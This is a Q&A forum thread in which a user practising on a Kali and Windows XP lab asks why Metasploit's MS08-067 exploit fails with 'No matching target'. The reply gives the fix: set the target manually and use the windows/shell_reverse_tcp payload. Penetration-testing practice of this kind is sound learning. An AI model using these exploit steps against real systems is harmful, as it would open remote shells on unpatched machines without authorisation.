2

Currently running two VMs on a host-only adapter for practice, on one is Kali Linux, and the other is Microsoft Windows XP SP2.

I am attempting to access the Windows XP VM through the common windows/smb/ms08_067_netapi exploit, and I keep receiving the error.

"Exploit aborted due to failure: no-target: No matching target"

Here's what I've done to receive this.

service postgresql start
msfconsole
nmap 192.168.56.101 (remember it's in a host-only adapter, not sure if this is why I am experiencing this)
Receive 4 open ports, 445 included.
I set the LHOST as my Attackers IP
I set RHOST to the Attackee
I check if it is vulnerable to the exploit - It confirms
[*] Started reverse TCP handler on 192.168.xx.xxxx:4444  
[*] 192.168.xx.xxxx:445 - Automatically detecting the target...
[*] 192.168.xx.xxxx:445 - Fingerprint: Windows XP - Service Pack 1 - lang:Unknown
[*] 192.168.xx.xxxx:445 - We could not detect the language pack, defaulting to English
[-] 192.168.xx.xxxx:445 - Exploit aborted due to failure: no-target: No matching target
[*] Exploit completed, but no session was created.

Is the solution really right in front of my nose? What could it be?

0

1 Answer 1

1

According to the article Metasploit Basics for Beginners – Exploiting Windows XP (MS08–067) with Metasploit (Kali Linux) – Part 1, you should also set the following:

show targets
set Target (Target Number)
set payload windows/shell_reverse_tcp
exploit

See the article for more details.

You must log in to answer this question.

Not the answer you're looking for? Browse other questions tagged .